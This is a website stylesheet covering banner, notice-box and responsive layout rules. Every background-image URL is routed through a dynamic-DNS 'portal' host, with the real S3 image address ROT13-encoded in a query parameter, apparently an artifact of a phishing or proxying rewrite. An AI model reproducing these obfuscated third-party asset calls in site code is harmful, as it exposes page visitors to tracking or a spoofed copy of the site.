#bannerSwiper{
    width : 1296px;
}

.main_top {
    height: 520px;
    background-size: cover;
    background-repeat: no-repeat;
    /* background-position-x: 90%; */
    letter-spacing: -0.0875rem;
}

#mainTop1 {
    background-image: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Slbhavafhojnl.f3.nznmbanjf.pbz%2Spff%2S..%2Svzntrf%2Sonaare%2Sznva_onaare_01.cat);
}
#mainTop2 {
    background-image: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Slbhavafhojnl.f3.nznmbanjf.pbz%2Spff%2S..%2Svzntrf%2Sonaare%2Sznva_onaare_02.cat);
}
#mainTop3 {
    background-image: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Slbhavafhojnl.f3.nznmbanjf.pbz%2Spff%2S..%2Svzntrf%2Sonaare%2Sznva_onaare_03.cat);
}
#mainTop4 {
    background-image: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Slbhavafhojnl.f3.nznmbanjf.pbz%2Spff%2S..%2Svzntrf%2Sonaare%2Sznva_onaare_04.cat);
}
#mainTop5 {
    background-image: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Slbhavafhojnl.f3.nznmbanjf.pbz%2Spff%2S..%2Svzntrf%2Sonaare%2Sznva_onaare_05.cat);
}
#mainTop6 {
    background-image: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Slbhavafhojnl.f3.nznmbanjf.pbz%2Spff%2S..%2Svzntrf%2Sonaare%2Sznva_onaare_06.cat);
}
#mainTop7 {
    background-image: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Slbhavafhojnl.f3.nznmbanjf.pbz%2Spff%2S..%2Svzntrf%2Sonaare%2Sznva_onaare_07.cat);
}


.main_top .row {
    height: 520px;
}

.main_top img {
    max-height: 30px;
}

#main_section02{
    z-index: 10;
    position: relative;
}

#main_section02 .col-sm-4 {
    position: relative;
    top : 0rem;
}

#main_section02 .col-sm-4 .bg_point {
    padding: 40px 30px;
}

.gray_box {
    padding: 30px;
    border-radius: 6px;
    display: flex;
    margin-top: 16px;
}

.gray_box img {
    max-width: 24px;
    max-height: 24px;
}

#main_sec3 {
    height: 360px;
    background: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Slbhavafhojnl.f3.nznmbanjf.pbz%2Spff%2S..%2Svzntrf%2Sznva_ot02.cat);
    background-size: cover;
    background-repeat: no-repeat;
}

#main_sec3 .row:nth-child(1) {
    height: 360px;
}

.sw_line {
    color: #000;
    opacity: .1;
}


.notice_swiper {
    height: 24px;
    width: 100%;
    text-align: left;
}

.notice_swiper .swiper-slide {
    text-align: left;
}

.notice_swiper .swiper-slide img {
    max-width: 24px;
    max-height: 24px;
    position: absolute;
    top: 0;
    right: 0;
}

.notice_box {
    background-color: var(--primary-green);
    border-radius: 6px;
    margin-top: 20px;
    margin-left: 12px;
    margin-right: 12px;
    padding: 30px;
    text-align: center;
    color: #fff;
}

.notice_box:nth-child(1) {
    margin-left: 0;
}

.notice_box:last-child {
    margin-right: 0;
}

.notice_box img {
    max-width: 60px;
    max-height: 60px;
    margin-bottom: 18px;
}


.notice_box02 {
    padding: 35px 0 7px 0;
    text-align: center;
    color: #fff;
}

.notice_box02 a {
    color: #fff;
}

.notice_box02 img {
    max-width: 40px;
    max-height: 40px;
    margin-bottom: 22px;
}

.intro_swiper .swiper-slide:has(.img-fluid) {
    width: 145px !important;
}

#main_support img {
    max-width: 145px;
}

#main_support .col-sm {
    text-align: center;
}

#main_support {

    margin-top: 3.125rem;
    margin-bottom: 7.75rem;
}

.intro_swiper .swiper-slide img {
    display: block;
    width: 128px;
    height: 128px;
    min-width: 128px;
}

#introPagination{
    bottom: -45px;    
}

#introNext{
    top: 140px;
    right: calc( 50% - 175px);    
}
#introPrev{
    top: 140px;
    left: calc( 50% - 175px);    
}


@media screen and (max-width:1020px) {

    #main_sec3 {
        height: 100vh;
    }

    #main_sec3 .row:nth-child(1) {
        height: 100vh;
    }

    #main_sec3 .col-sm {
        flex-basis: auto;
    }

    #main_support .col-sm {
        max-width: 50%;
    }
}

@media screen and (max-width:576px) {
    #bannerSwiper{
        width : 100%;
    }
    
    #main_sec3 {
        height: 544px;
        background: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Slbhavafhojnl.f3.nznmbanjf.pbz%2Svzntrf%2Sznva_ot02_zbovyr.cat);
        background-size: cover;
        background-repeat: no-repeat;
    }

    #main_sec3 .row:nth-child(1) {
        height: 544px;
    }

    /* .main_top img {
        max-height: 22px;
    } */

    #main_section02{
        top : 40px;
    }
    
    #main_section02 .col-sm-4 {
        top: -2.5rem;
    }
    
    .sw_line {
        display: none;
    }

    .swiper_title {
        max-width: 250px;
        white-space: nowrap;
        overflow: hidden;
        text-overflow: ellipsis;
    }

    .notice_box {
        border-radius: 0;
        margin-left: 0;
        margin-right: 0;
        max-width: 33.33333333%;
        padding: 23px 15px;
        top: 66px;
    }

    .notice_box img {
        max-width: 30px;
        max-height: 30px;
        margin-bottom: 8px;
    }

    .notice_box02 {
        padding: 25px 0 7px 0;
        display: flex;
        justify-content: center;
    }

    .notice_box02 img {
        max-width: 24px;
        max-height: 24px;
        margin-bottom: 0;
        margin-right: 20px;
        margin-top: 3px;
    }

    .notice_box02 .fs_24 {
        margin-right: 20px;
        margin-top: 3px;
    }

    .m_order_ab {
        position: relative;
        top: -44px;
    }

    .m_order_ab2 {
        position: absolute;
        top: -241px;
        width: calc(100% - 24px);
    }

    .gray_box {
        padding: 20px;
    }

    .main_top {
        background-position-x: 50%;
        max-height: 180px;
    }

    .intro_swiper .swiper-slide:has(.img-fluid) {
        width: 90px !important;
    }

    #main_support img {
        max-width: 90px;
    }

    #main_support {
        margin-top: 3rem;
        margin-bottom: 3rem;
    }

    #introNext{
        display: none;
    }
    #introPrev{
        display: none;
    }
    #telTable{
        width : calc(100vw - 15px);
    }
    #telTable td{
        text-align: center;
    }

    #telTable .tdIcon {
        width : 54px; 
        text-align: right ;
    }

    #telTable .tdNumber {
        height : 50px;
        text-align: center ;
    }

    #telTable img{
        width : 24px;
        height : 24px;
    }
    #telTable .fs_24{
        color : white;
    }
    #telTable a{
        color : white;
    }


}

@media screen and (max-width:320px) {
    .m_order_ab {
        top: -40px;
    }

    .m_order_ab2 {
        top: -250px;
    }
}